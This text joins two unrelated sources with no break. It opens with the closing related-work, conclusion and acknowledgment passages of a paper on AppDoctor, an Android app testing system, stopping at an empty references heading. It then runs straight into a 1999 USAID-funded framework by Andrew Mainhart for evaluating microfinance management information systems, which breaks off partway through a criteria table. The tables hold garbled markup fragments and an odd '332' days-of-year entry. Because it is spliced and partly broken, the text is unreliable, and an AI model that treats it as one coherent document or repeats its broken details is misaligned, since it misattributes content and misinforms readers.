Static tools often have a hard time analyzing event-driven programs and generate exceedingly many FPs that bury real bugs. Fuzz testing [28, 47] feeds random inputs to programs. Without knowledge of the programs, this approach has difficulty getting deep into the program logic. Model-based testing has been applied to mobile systems [9, 35, 37, 45]. These systems automatically inject GUI actions based on a model of the GUI. To extract this model, various techniques are used. Robotium [6] uses reflection to collect widgets on the GUI. Dynamic crawlers [9, 35, 37] collect available events from GUI widgets, an approach AppDoctor also takes. Some use static analysis to infer possible user actions for each widget [53]. Regardless of how they compute models, they perform actions either in faithful mode (i.e., injecting low-level events) or in approximate mode (i.e., directly calling handlers), but not both. As illustrated in §3, they suffer from either low speed or high manual inspection effort. Moreover, none of them systematically tests for lifecycle events. Interestingly, despite the significant FP rate (25% in our experiments), no prior systems that inject actions in approximate mode noted this problem, likely due to poor checking coverage. For example, DynoDroid [37] caught only 15 bugs in 1050 apps. Several systems [10, 19, 38] leverage symbolic execution to check apps or GUI event handlers. The common approach is to mark the input to event handlers as symbolic and explore possible paths within the handlers. These systems tend to be heavyweight and are subject to the undecidability of constraint solving. The event-driven nature of apps also raises challenges for these systems, as tracing the control flow through many event handlers may require analyzing complex logic in both the GUI framework and the apps. Thus, these systems often use approximate methods to generate event sequences, which may not be feasible, causing FPs.
Authors of a workshop paper [39] describe test drivers that call event handlers, including lifecycle event handlers, to drive symbolic execution. However, they call lifecycle event handlers only to set up an app to receive user actions. They do not systematically test how the app reacts to these events. Nor did they present an implemented system. Symbolic execution is orthogonal to AppDoctor: it can help AppDoctor handle custom widgets and actions (§9), and AppDoctor can help it avoid FPs by generating only feasible event sequences. Mobile devices are prone to security and privacy issues. TaintDroid [18], PiOS [17] and CleanOS [46] leverage taint tracking to detect privacy leakages. Malware detectors, RiskRanker [25] and Crowdroid [13], use both static and dynamic analysis to identify malicious code. Mobile devices are prone to abnormal battery drain caused by apps or configurations. Prior work [36, 42] detects or diagnoses abnormal battery problems. Action slicing shares the high-level concept with program slicing [8, 30, 33, 48], which removes unnecessary instructions from programs, paths, or traces. Different from program slicing, action slicing prunes actions, rather than instructions. It embraces approximation to aggressively slice out actions and replay to validate the slicing results. 11. Conclusion We presented AppDoctor, a system for efficiently and effectively testing Android apps and helping developers diagnose bug reports. AppDoctor uses approximate execution to speed up testing and automatically classify most reports into bugs or false positives. It uses action slicing to remove unnecessary actions from bug traces, further reducing diagnosis effort. AppDoctor works on Android, and operates as a device or emulator cloud. Results show that AppDoctor effectively detects 72 bugs in 64 of the most popular apps, speeds up testing by 13.3 times, and vastly reduces diagnosis effort. 
Acknowledgments We thank Charlie Hu (our shepherd), Xu Zhao, and the anonymous reviewers for their many helpful comments. This work was supported in part by AFRL FA8650-11-C-7190, FA8650-10-C-7024, and FA8750-10-2-0253; ONR N00014-12-1-0166; NSF CCF-1162021, CNS-1117805, CNS-1054906, and CNS-0905246; NSF CAREER; AFOSR YIP; Sloan Research Fellowship; and Google. References
# Management Information Systems for Microfinance: An Evaluation Framework

by Andrew Mainhart
Development Alternatives, Inc.

November 1999

This work was supported by the U.S. Agency for International Development, Bureau for Global Programs, Center for Economic Growth and Agricultural Development, Office of Microenterprise Development, through funding to the Microenterprise Best Practices (MBP) Project, contract number PCE-C-00-96-90004-00.

Andrew Mainhart, a Senior Development Specialist, has worked at Development Alternatives, Inc. (DAI) since 1998. He has provided technical advisory support to the CARD Bank in the Philippines, the Bank for Agriculture & Agricultural Cooperatives in Thailand, and ACLEDA in Cambodia. Mr. Mainhart has supported several USAID projects around the world, including the Program for the Recovery of the Economy in Transition in Haiti, the Newbiznet project in the Ukraine, and the TFED project in Tanzania. In addition, he has spent time in Indonesia working with the information technology team at the Bank Rakyat Indonesia studying the bank's information systems. Mr. Mainhart holds a B.S. degree in industrial management from Carnegie Mellon University. Before entering the microfinance field, he worked as a consultant with Andersen Consulting, implementing large-scale software projects for Fortune 500 companies, and as a manager in the Information Technology Division of Bell Atlantic, a large U.S.-based telecommunications company.

# ACKNOWLEDGMENTS

The author has benefited greatly from the comments of Robin Young, Matthew Buzby, Nhu-An Tran, John Magill, and Zan Northrip of Development Alternatives, Inc.; Anicca Jansen of the USAID Microenterprise Development Office; David Ferrand of the Department for International Development; Xavier Reille of Catholic Relief Services; Brigit Helms of CGAP; and Tony Sheldon, Todd Girvin, Nick Ramsing, and Ruth Goodwin.
The author would also like to acknowledge the assistance of all those who participated in the MBP Information Systems in Microfinance seminar held in Washington, D.C., on March 8, 1999. To all those who provided comments, guidance, and other assistance, the author expresses profound thanks and gratitude. Of course, all views, omissions, and errors are attributable solely to the author.

# TABLE OF CONTENTS

## CHAPTER ONE **INTRODUCTION**
- BACKGROUND
- PURPOSE
- METHODOLOGY
- USAGE
- DOCUMENT STRUCTURE

## CHAPTER TWO **THE FRAMEWORK**
- CATEGORY HIERARCHY
- RESEARCH MATRIX
- RATING METHOD

## CHAPTER THREE **CATEGORY 1: FUNCTIONALITY AND EXPANDABILITY**

## CHAPTER FOUR **CATEGORY 2: USABILITY**

## CHAPTER FIVE **CATEGORY 3: REPORTING**

## CHAPTER SIX **CATEGORY 4: STANDARDS AND COMPLIANCE**

## CHAPTER SEVEN **CATEGORY 5: ADMINISTRATION AND SUPPORT**

## CHAPTER EIGHT **CATEGORY 6: TECHNICAL SPECIFICATIONS AND CORRECTNESS**

**BACKGROUND**

Over the past 5 to 10 years, microfinance institutions (MFIs) have been paying increasing attention to information systems, particularly
management information systems (MIS). As both practitioners and donors have become aware of the great need for formal and informal financial institutions to manage large amounts of data, the drive to improve the manipulation and understanding of these data has grown.

Information lies at the very heart of microfinance. Whether by hand or by computer, microfinance institutions maintain large amounts of critical business data, from basic client information to detailed analyses of portfolio statistics. These data must be stored, manipulated, and, most important, presented coherently to system users so that they can make sound management decisions. A good information system should do just that: It should act as a conduit through which raw data becomes useful and useable information.

A good information system is a necessary tool for managing an institution successfully. This assertion, however, begs two questions: What is a good information system? And how does one determine whether a system is good? The easy answer to both questions is that any system that meets an organization's needs cost-effectively and allows the organization to grow without creating problems or inefficiencies is a good system. Obviously, this simple answer is not terribly helpful. For this reason, the need for an evaluation framework has become imperative, especially considering the microfinance field's relative lack of knowledge about information systems and software development.

**PURPOSE**

The primary purpose of this paper is to present a mechanism for analyzing information systems, both those bought off-the-shelf and those developed internally. This MIS Evaluation Framework offers the industry a tool to determine the quality of an information system. The framework is very flexible and can be used by MFIs, donors, and other external stakeholders, as well as systems developers, to address different objectives:

- MFIs can use it to evaluate off-the-shelf systems in their search for an appropriate solution.
- MFIs can use it to appraise the quality of their existing system (off-the-shelf or internally developed) to help identify improvements.
- External entities can use it to evaluate off-the-shelf or internally developed systems either to assist an MFI, identify alternatives, or as part of an institutional appraisal.
- Software developers and information system planners can use it to build better systems.

A certain level of generality was used in constructing the framework to meet the needs of a diverse audience. Consequently, factors specific to the organization or vendor in question (for example, stage of development, growth prospects, and number and complexity of products) should be added on a case-by-case basis. Because the framework is a tool, the evaluator needs to understand the situation and apply the framework in the most logical and effective way.

**METHODOLOGY**

Drawing from computer industry standards, such as DataPro, GartnerGroup, and Patricia Seybold Group,\(^1\) as well as the experience of software professionals, this paper outlines and defines a set of categories that can and should be used to evaluate any information system used in microfinance. To ensure this framework incorporates issues specific to microfinance—particularly the variety of microfinance institutional models, products, and services—the author consulted the Consultative Group to Assist the Poorest (CGAP) *Handbook for Management Information Systems for Microfinance Institutions* and spoke with numerous microfinance professionals.

**USAGE**

Any organization that decides to use this framework to perform a systems appraisal needs to be aware of several important factors:

**Team membership.** The appraisal team should consist of at least two people. The size of the team will depend on the depth of the review and the experience and skills of the team members.
The following factors should be considered when formulating such a team:

- **Information technology expertise.** The framework is written in an attempt to simplify the often-complicated world of computer systems; however, as with any technical field, background knowledge of the subject matter is a necessity for the reviewer. At least one member of the appraisal team should have knowledge of computers and software, especially software development and support. A sound understanding of the standard software development process (such as the one outlined in the CGAP *Handbook for Management Information Systems for Microfinance Institutions*) and information architectures is crucial to the performance of this type of review.

- **Functional expertise.** Since these reviews will be conducted on microfinance institutions, at least one member of the appraisal team should have expertise in microfinance. In addition, a general knowledge of both accounting and financial principles is a minimal requirement for performing any appraisal of a financial system.

- **Institutional expertise.** When reviewing systems for use in a specific institution, there should be internal representation on the team. This team member would know the MFI's operations intimately and could replace the team member providing functional expertise. If the institution has an experienced systems person, the team could consist of solely internal personnel.

**Access to key personnel.** Reviewers will need to meet with both the users and developers of the system.

---
\(^1\) These organizations publish detailed reports on various kinds of computer software, from operating systems to database management systems to banking software. Information technology specialists typically refer to these sources when selecting appropriate software for a given technical and/or functional environment. Generally, their reports offer in-depth, qualitative and quantitative analyses across a broad range of industry requirements and specifications.
- In the case of a study of an internally developed system, the reviewers should have ample time to discuss the system with management and the technical support staff, as well as field operators, such as tellers and loan officers.

- When reviewing off-the-shelf packages, the appraisal team should meet with the vendor, including vendor management and technical support. Site visits are a must when evaluating vendor software. The review team should visit at least one organization using the system and question the users and technical staff about the system.

**Detailed business information.** Before undertaking a review of information systems, the appraisal team must have a clear understanding of the MFI's business processes. This requirement is equally valid for an MFI conducting a review of off-the-shelf packages or evaluating its own systems, as well as for an external review team evaluating a particular MFI's system. The appraisal team (internal or external) will need to work closely with the MFI's operations staff to understand the processes and methodology, as well as personnel, geographic locations, and, most important, future goals and growth plans. The review team will need to obtain documentation about the institution, including organizational charts, strategic and business plans, growth projections, operational structures and procedures, product descriptions, and personnel descriptions.

**System documentation.** The appraisal team should obtain copies of all manuals (such as user handbooks and administration guides), reports, screens (windows), and operations schedules (version schedules, backup schedules, and so on).

**Detailed system information.** The appraisal team will need additional information that is typically not available in the system documentation. The following information, which is more fundamentally technical, will provide the reviewers with a deeper level of understanding of the system:

- **Database information.**
Whenever possible, the reviewers should obtain a copy of the database structure (that is, how the data are stored in the form of tables, columns, rows, and so on), usually found in a data model. If a formal data model is not available, then a printout of the database structure will suffice. (The only major difference is that a data model shows the relationships between different pieces of information, which are especially important in terms of performance and flexibility.)

- **Demonstration.** Whenever possible, a demonstration version (or demo) of the software should be procured. Regardless, the reviewer should always have access to a fully functional version of the system.

- **Source code.** Access to the source code\(^2\) and the database (as well as the data stored within) is not necessary but highly recommended, especially for more in-depth analysis. Many vendors and even some institutions will balk at this request, so beware. As stated, source code is not a requirement, but it will greatly assist the appraisal team.

- **Testing.** To determine if the calculations performed by the system are accurate, it is valuable to enter actual data from the MFI and compare the calculations with expected results. In this case, access to the database would be crucial.

**Site visit.** To perform a detailed review, a two-person team will need at least three to five days on site, depending on the complexity of the system and the experience level of the team members. Allow an additional one to two days for off-the-shelf software when site visits are required. Of course, the reviewer will also need time to write the actual report. Since the team will need to review a large amount of information in the course of the appraisal, it is best to request the above documentation well in advance.
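The distinction drawn above between a printout of the database structure and a formal data model can be illustrated with a toy schema. This is a minimal sketch, not taken from any real MFI system: the table and column names (`customer`, `account`, and so on) are invented for illustration, using Python's built-in `sqlite3` module.

```python
import sqlite3

# Hypothetical customer-centric structure of the kind a data model documents.
con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE customer (
    customer_id INTEGER PRIMARY KEY,
    name        TEXT NOT NULL,
    gender      TEXT
);
CREATE TABLE account (
    account_id   INTEGER PRIMARY KEY,
    customer_id  INTEGER NOT NULL REFERENCES customer(customer_id),
    account_type TEXT NOT NULL,   -- e.g. 'loan' or 'deposit'
    balance      NUMERIC NOT NULL DEFAULT 0
);
""")
# A plain printout shows only the tables and columns; the REFERENCES clause is
# the relationship a data model makes explicit (one customer, many accounts).
con.execute("INSERT INTO customer VALUES (1, 'A. Client', 'F')")
con.execute("INSERT INTO account VALUES (10, 1, 'loan', 500)")
con.execute("INSERT INTO account VALUES (11, 1, 'deposit', 25)")
rows = con.execute(
    "SELECT account_type, balance FROM account WHERE customer_id = 1"
).fetchall()
print(rows)  # both accounts belong to the same customer
```

Seeing the relationship, and not just the columns, is what lets a reviewer judge how flexibly the system can attach new account types to an existing customer.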
How quickly and efficiently the reviewers are provided with much of this information (especially system-generated or related information, such as reports and user guides) may indicate the system's and user's competence or completeness.

**DOCUMENT STRUCTURE**

The remaining portion of this document describes the framework itself. The framework has been broken into distinct **categories**. Each category has been further broken into one or more **topics**, which are defined in a **research matrix**. The research matrix describes each category with all corresponding topics, including any subtopics, with a category and topic (or subtopic) definition, measurement criteria, and a rating method.

A hierarchical listing of the framework's categories and their associated topics and subtopics is provided below for quick reference. A full description of each category is given in the subsequent research matrix, in which each category is defined and supported with in-depth information about each topic and subtopic. The research matrix is the basic operational tool contained in the framework.

---
\(^2\) When creating a software application, computer programmers use special instructions written in computer languages to tell the computer what to do and how to function. There are many different computer languages on the market today, including C, C++, Visual Basic, and Delphi. The collection of all the instructions for a given application is called "source code." Having access to the source code allows the appraiser to review in-depth the logic and soundness of a given application.
### Table 1: Category Hierarchy

- **Functionality and Expandability**
  - Functional completeness, appropriateness, and integration
    - Accounting package
    - Portfolio tracking
    - Deposit monitoring
    - Customer information system
  - Expandability and institutional growth
  - Flexibility
    - Customer-centric vs. account-centric
    - Institutional types
    - Lending methodologies
    - Loan interest types
    - Savings and deposit account types
    - Deposit interest types
    - Payment types
    - Payment frequencies
    - Multiple branches or regions
    - Multiple languages
    - Multiple currencies
- **Usability**
  - Ease of use and user-friendliness
  - User interface
- **Reporting**
  - Reports
  - Report generation
- **Standards and Compliance**
  - Accounting soundness and standards
  - Governmental and supervisory adherence
- **Administration and Support**
  - Security
  - Backup and recovery
  - Fault tolerance and robustness
  - End-of-period processing
  - Support infrastructure and maintenance
  - Version control and upgrade strategy
- **Technical Specifications and Correctness**
  - Technology and architecture
  - Performance
  - Number and date handling
- **Cost**
  - Pricing and costs

The matrix that begins in Chapter Three is organized by category. The category describes, at a high level, the areas in which an information system should be evaluated. Categories represent logical groupings of different subject areas that indicate the fundamental quality of a system. Each category, along with a listing of the corresponding topics and subtopics, is given in Table 1.

The matrix outlines each topic within a category using three columns: topic (or subtopic), definition, and measurement criteria. An additional column is provided for the evaluator's rating or comments:

- **Topic (or subtopic):** name of the topic or subtopic. A subtopic is denoted by a ➔ before the name, with the name of the parent topic in parentheses underneath the subtopic name.
- **Definition:** brief definition of the topic or subtopic. The definition is descriptive in nature and should provide enough information for the general user of this matrix to understand what the topic is and what issues or concerns it addresses.
- **Measurement criteria:** the types of items or issues that should be looked at when assessing a system for the particular topic. The measurement criteria for any given topic are merely suggested. Some effort has been made to delineate the primary criteria for assessing a topic; however, given the varied nature of both computer systems and microfinance, users of this evaluation tool should determine from their surroundings whether more or fewer criteria would be useful in assessing the topic.
- **Rating/comments:** a blank column providing the evaluation team with a space to write comments and determine ratings for the individual topics and subtopics according to the guidelines given below.
**RATING METHOD**

Each topic or subtopic will receive a rating of 1 to 5, with five being the highest. The rating for each topic or subtopic is determined by using the corresponding definition and measurement criteria as guidelines. It is important to note that the framework provides limited detail on how to evaluate each point, since it assumes a knowledgeable team with sufficient expertise to use judgment in determining ratings. A rating score sheet is provided in Annex A to assist the evaluation team in determining weights and tallying ratings.\(^3\)

For any topic with subtopics, the overall topic rating should be an average of the scores for the corresponding subtopics. For example, the "Functional Completeness, Appropriateness, and Integration" topic has four subtopics. The overall rating for this topic would consist of the average of these four scores. Of course, these ratings are subjective, and evaluators may want to adjust the overall rating for any given topic beyond the straight subtopic average. In these cases, evaluators should submit a comment that explains the reason for the adjustment.

A slightly different technique should be applied for homegrown systems versus off-the-shelf systems. For instance, an evaluation of an internal system needs to take into consideration the appropriateness of that system in light of the microfinance institution's stage of development, strategic direction, scale, complexity, and projected growth. In many ways, off-the-shelf systems should be held to a higher standard because they should be applicable to a wider range of organizations and environments.

Because this framework is an analytical tool, the evaluators are responsible for determining the best method for applying the framework to any given situation. For instance, in some cases it may not be necessary to rate the software on certain topics or subtopics because they may not be relevant to the MFI (e.g., multiple currencies, different languages, etc.).
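The averaging-and-weighting arithmetic described above can be sketched in a few lines of code. This is an illustration only, not part of the Framework or its Annex A score sheet; the topic names, scores, and weights are hypothetical.

```python
# Sketch of the rating method: each topic is scored 1-5; a topic with
# subtopics receives the average of its subtopic scores; the appraisal
# team then combines topics using its own priority weights.

def topic_rating(subtopic_scores):
    """A topic's overall rating is the average of its subtopic scores (1-5)."""
    return sum(subtopic_scores) / len(subtopic_scores)

def weighted_total(ratings, weights):
    """Combine per-topic ratings using the team's priority weights."""
    total_weight = sum(weights[t] for t in ratings)
    return sum(ratings[t] * weights[t] for t in ratings) / total_weight

# Hypothetical scores for two topics:
ratings = {
    "Functional Completeness": topic_rating([4, 3, 5, 4]),  # four subtopics
    "Support Infrastructure": 2,  # no subtopics; rated directly
}
# The team decided technical support matters twice as much as functionality:
weights = {"Functional Completeness": 1, "Support Infrastructure": 2}

print(round(weighted_total(ratings, weights), 2))  # 2.67
```

Note how heavy weighting of support drags down an otherwise feature-rich system, which is exactly the "feature-rich but poorly supported" trap the text warns against.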
Before completing the rating, the appraisal team should prioritize the criteria and then assign weights accordingly. For instance, many MFIs feel that the availability and quality of technical support is a critical issue. Many MFIs have fallen into the trap of buying a feature-rich system that has poor technical support, or no local technical support. This situation can be worse than having no system at all.

---
\(^3\) This framework does not provide a mechanism for overall rating of the system, but rather rates the software by topic only. The evaluator could attempt to determine a rating for each category by taking an average, weighted or otherwise, of its corresponding topics, but this is not necessarily recommended or required.

## CHAPTER THREE **CATEGORY 1: FUNCTIONALITY AND EXPANDABILITY**

**Description:** Measures the extent to which a software product meets the requirements of different types of microfinance programs and whether it has the capacity to grow and expand with a microfinance institution as the organization evolves and adds functions and clients. On a deeper level, this category deals with how functionally rich a program is—including the types of institutions and methodologies that the software supports. The evaluation of this category would include both front-office and back-office functions.

The most intriguing complexity that microfinance imposes on the software developer is its diverse nature. Financial systems by themselves are difficult enough to develop. Microfinance adds several new layers. For example, within the field of microfinance there are numerous different lending methodologies, such as village banking, solidarity groups, and individual lending. There are also many institutional models, such as credit unions, cooperatives, non-governmental organizations (NGOs), and banks (from informal to formal and from small scale to large scale).
In addition, the methods for interest and payment calculation are as varied as the number of loan products offered in the field today. To exacerbate the problem, many of these variations can occur inside the same organization. Of course, all of these organizations operate within diverse social, political, economic, regulatory, and legal environments around the world. Add in the different currencies, languages, and reporting requirements and one can begin to fathom the difficulties in creating a quality application that supports one organization, let alone one that supports many. The appraisal team should consider these complexities as the appraisal team completes this section of the Framework. Topics: Functional Completeness, Appropriateness, and Integration; Expandability and Institutional Growth; Flexibility <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | **Functional Completeness, Appropriateness, and Integration** | The features of the system meet the needs of the business in an appropriate fashion. Integration refers to how well the different components of the system can communicate with each other, thus allowing data sharing and reducing the need for multiple entry of data (the need to input the same data into different parts of the system). | (* see subtopics for more details) - Accounting functionality* - Portfolio tracking capabilities* - Savings/deposit tracking facilities* - Client information tracking facilities* - Systems integration - Tracking of nonfinancial activities (impact, business development services, etc.) | | | ➔ Accounting Package (Functional Completeness ...) | Ability of the software to perform a full range of accounting activities. 
| - Integrated with the savings and portfolio tracking system, or stand-alone\(^4\) - Level of integration—direct (changes made in savings and/or portfolio tracking system immediately affect the proper accounts) or indirect (accounting package is separate, necessitating a periodic update of accounting data) - Complete, consistent, flexible and user-definable chart of accounts (number of digits, levels, and formats) - Tracking of cash flow, revenues, and expenses by several sources or profit/cost centers (donor, account, branch, product, etc.) in addition to consolidated tracking of this information - Ability to perform cost/profitability analysis by product, branch/region, client, etc. - Cash vs. accrual—if accrual, proper provisioning of receivables - Loan loss provisioning and reserves - General ledger - Trial balances - Permits entry of nonportfolio or deposit related income and expenses | | \(^4\) Whether or not an integrated system is preferable is a hotly debated point within the microfinance industry. The appraisal team should decide beforehand whether system integration is important in the context of the specific review. 
<table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td>§ Full range of standard financial reports (balance sheet, income statement, cash flow, etc.)&lt;br.§ Track and apply overhead expenses&lt;br.§ Asset and liability management facilities&lt;br.§ Payroll module&lt;br.§ Fixed assets module&lt;br.§ Treasury functions</td> <td></td> </tr> <tr> <td>➔ Portfolio Tracking (Functional Completeness ...)</td> <td>Ability of the software to monitor and manage the loan portfolio.</td> <td>§ Integrated with accounting system, deposit monitoring, and/or customer information system&lt;br.§ Permits the addition and modification of loan products&lt;br.§ Historic data on products&lt;br.§ Forced deposits (linked to deposit monitoring) with ability to block access to forced savings (where appropriate)&lt;br.§ Linking of forced savings to loans or “membership”&lt;br.§ Collateral (cash and noncash) tracking&lt;br.§ Guarantor tracking and number of guarantors per loan&lt;br.§ Identifying and cross-referencing of group guarantees&lt;br.§ Loan officer specific information (active portfolio, delinquency, number of clients, etc.)&lt;br.§ Correct portfolio aging mechanisms&lt;br.§ Proactively informs the users of potential problems (delinquency, cash standing, productivity, etc.)&lt;br.§ Delinquency management facilities&lt;br.§ Delinquency calculation methodology&lt;br.§ Handling of early, late, partial, and extra payments&lt;br.§ Credit scoring capabilities&lt;br.§ Advanced functionality such as credit cards or smart cards</td> <td></td> </tr> <tr> <td>➔ Deposit Monitoring (Functional Completeness ...)</td> <td>Ability of the software to handle deposit accounts.</td> <td>§ Integrated with accounting system, portfolio tracking, and/or customer information system&lt;br.§ Permits the addition and modification of deposit types&lt;br.§ Historical data on products&lt;br.§ Voluntary 
deposits (with some tracking of or information about forced savings—linked to portfolio tracking)&lt;br.§ Permits different account types&lt;br.§ Advanced functionality such as ATMs, wire transfers, and smart cards&lt;br.§ Tax withholding functionality</td> <td></td> </tr> <tr> <td>Topic</td> <td>Definition</td> <td>Measurement Criteria</td> <td>Rating/Comments</td> </tr> <tr> <td>-------</td> <td>------------</td> <td>----------------------</td> <td>-----------------</td> </tr> </tbody> </table> | **→ Client Information System (Functional Completeness...)** | Ability of the software to maintain information about clients. | ▪ Strong search capabilities ▪ Maintains customer information such as name, family information, age, gender, address (home and business), and type of business, as well as impact information ▪ Tracks clients at different levels, from individual to group to center to village bank and so on ▪ Able to maintain group and/or village bank information ▪ Facilities to check customer behavior—i.e., credit and deposit status and history (either from external or internal sources) ▪ Historical data on customers ▪ Aggregation of customer data (by region, area, economic activity, loan officer, etc.) ▪ Able to track clients at different stages of the process ▪ Tracks nonclient information, especially guarantors ▪ Performs account transfer functionality (from forced to voluntary or vice versa, one geographic location to another, etc.) ▪ Identifies potential duplicates (i.e., double entry of clients) | | | **Expandability and Institutional Growth** | Ability of the system to support horizontal and vertical institutional growth. In essence, the scalability of the system is in question. 
| ▪ Modules available to support new products and services (e.g., demand deposits, credit cards, mortgage loans, lines of credit, and money transfers, in addition to standard microfinance services) ▪ Can move with the organization from informal (NGO) to formal financial institution (appropriate reports, treasury functions, etc.) ▪ Number of terminals it can support efficiently—with reasonable response times ▪ Number of clients it can handle with reasonable response times | | | **Flexibility** | Software is considered flexible when the system is easily altered to meet a new or different business requirement. Flexibility also refers to how adaptable an application is to (* see subtopics for more details) | ▪ Support customer-centric or account-centric view* ▪ Supports different institutional types* ▪ Supports multiple methodologies* ▪ Supports different loan interest calculations* ▪ Supports different deposit interest calculations* | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td></td> <td>different organizational or business situations. The adaptations or alterations can be in the form of changes to the program itself (e.g., code) or parameters used to set up the information system. In addition, the flexibility of a system is reflected in how easily important business-level items (i.e., products, tracking information such as donor, sex, or business type, etc.) can be added, modified, or deleted. Flexibility basically asks the question of how extensible or configurable a system is.</td> <td>• Supports multiple payment types*&lt;br&gt;• Supports different payment frequencies*&lt;br&gt;• Supports multiple branches and regions*&lt;br&gt;• Supports multiple languages*&lt;br&gt;• Supports multiple currencies*</td> <td></td> </tr> <tr> <td>Customer-centric vs. 
Account-centric (Flexibility)</td> <td>Software of this nature can view the world as starting either from a customer or from an account. This simple nuance can determine how flexible a system is, because a customer-centric system is usually more flexible than an account-centric system. In the customer-centric view, accounts are associated to a customer. In an account-centric world, customers are associated to an account.</td> <td>• Allows a customer to have more than one account and account type (deposit, credit, etc.)&lt;br&gt;• Allows the tracking and maintenance of customer data such as contact information, gender, marital status, business activity, etc.&lt;br&gt;• Allows detailed information about each account to be stored, such as account type, usage of funds, amount, etc.</td> <td></td> </tr> </tbody> </table> | **Institutional Types (Flexibility)** | Types of institutions the system is designed to support or could support given minimal modifications. | - Full-service banks - Limited-service banks - Cooperative savings and credit societies/unions - Microfinance institutions - Limited liability companies - Foundations or trusts - Other | | | **Lending Methodologies (Flexibility)** | The different types of microfinance loan approaches the system can support or could support given minimal modifications.
| - Handles only one lending methodology or can handle multiple methodologies simultaneously. Typical lending methodologies include: - Individual clients - Solidarity groups with individual loans - Solidarity groups with group loans - Village banks with individual loans - Village banks with group loans - Other | | | **Loan Interest Types (Flexibility)** | Different forms of interest rate calculations the system supports or could support given minimal modifications. | - Flat - Declining balance - Discounted from the loan - Capitalized - Variable rate - Stepped rate - Commissions and fees - Penalty fees for late payments - Other (user definable, etc.) | | | **Savings and Deposit Account Types (Flexibility)** | The different types of savings accounts supported by the deposit programs or could be supported given minimal modifications. | - Passbook (with or without passbook) - Term deposits (i.e., certificates of deposit) - Group savings - Group insurance fees - Off-book group savings - Demand deposits - Overdraft accounts - Current accounts | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | **Deposit Interest Types** | The different types of interest supported by the deposit programs or could be supported given minimal modifications. | • Day of deposit to day of withdrawal • Minimum daily balance • Minimum monthly balance • Minimum quarterly balance • Average daily balance • Average monthly balance • Average quarterly balance • Other (user definable, etc.) | | | **Payment Types** | The ability of the software to handle different common loan payment schedules as well as updates or changes to a payment schedule. How easily the system could be modified to handle new payment types should also be reviewed.
| • Term loans with constant payments • Term loans with constant principal • Irregular payments • Single payment • Balloon • Selection of initial and subsequent payment dates • Other (user definable, etc.) | | | **Payment Frequencies** | The ability of the software to handle frequent payments as well as standard payments; the ease with which the system can be modified to handle different payment frequencies. | Payment frequencies supported: • Daily • Weekly • Biweekly • Semimonthly • Once every four weeks • Monthly • Other (user definable, etc.) | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td>Days (or weeks) of the year supported:</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ 365</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ 360</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ 332</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ 50 weeks</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Other</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Payment aberrations support:</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Prepayments</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Late payments</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Underpayments</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Overpayments</td> <td></td> </tr> <tr> <td>➔ Multiple Branches and/or Regions (Flexibility)</td> <td>Ability of the software to handle multiple offices, at either a branch or regional level.
In addition, how quickly the system can be updated to handle multiple branches or regions or new locations.</td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Mechanisms for separating information on an office basis</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Mechanisms for aggregating office level data (on-line, store and forward, etc.)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Reporting on an office or area basis</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Frequency of updates to head office or area office</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Bank and/or account transfers (intra- or inter-)</td> <td></td> </tr> <tr> <td>➔ Multiple Languages (Flexibility)</td> <td>Can the software handle multiple languages or could it handle them given minimal modifications?</td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Supports local language (if written)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Can support languages on a user basis—multiple languages simultaneously</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ All messages are in the language of choice</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ All screen information is presented in language of choice</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Multiple language support requires recoding (language is hardcoded) or is intrinsic to the system (language is parameterized)</td> <td></td> </tr> <tr> <td>➔ Multiple Currencies (Flexibility)</td> <td>Can the software handle multiple currencies or could it handle them given minimal modifications?</td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Supports local currencies and foreign currencies</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Supports payments and disbursements in different currencies</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Supports foreign exchange exposure calculation facilities</td> <td></td> </tr> <tr> <td></td> <td></td> <td>§ Handles
